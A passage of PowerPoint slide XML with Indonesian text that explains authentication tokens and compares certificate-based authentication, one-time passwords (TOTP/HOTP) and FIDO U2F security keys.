              <a:t>autentikator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Autentikator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghasilkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> token yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengautentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tiga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>utama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembuatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> token:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Otentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemohon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pribadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghasilkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> token yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditandatangani</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>unik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>identitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memverifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kelemahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>utama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pendekatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>administratif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengimplementasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> PKI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerbitkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> digital.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>One-Time Password (OTP)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> token </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semacam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> hash pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rahasia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bersama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditambah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> seed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sinkronisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cap </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (TOTP) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> HMAC (HOTP). Token </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sekali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> token </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keputusan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pendekatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pasangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan hashing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memerlukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> PKI.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Fast Identity Online (FIDO) Universal 2nd Factor (U2F)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pasangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>privat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendaftarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengomunikasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rahasia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bersama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merupakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kelemahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> HOTP dan TOTP. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>privat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> U2F dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menandatangani</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> token; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>didaftarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memverifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> token. Karena </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> digital yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terlibat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>solusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bergantung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada PKI.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Token </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dihasilkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cryptoprocessor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Desain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
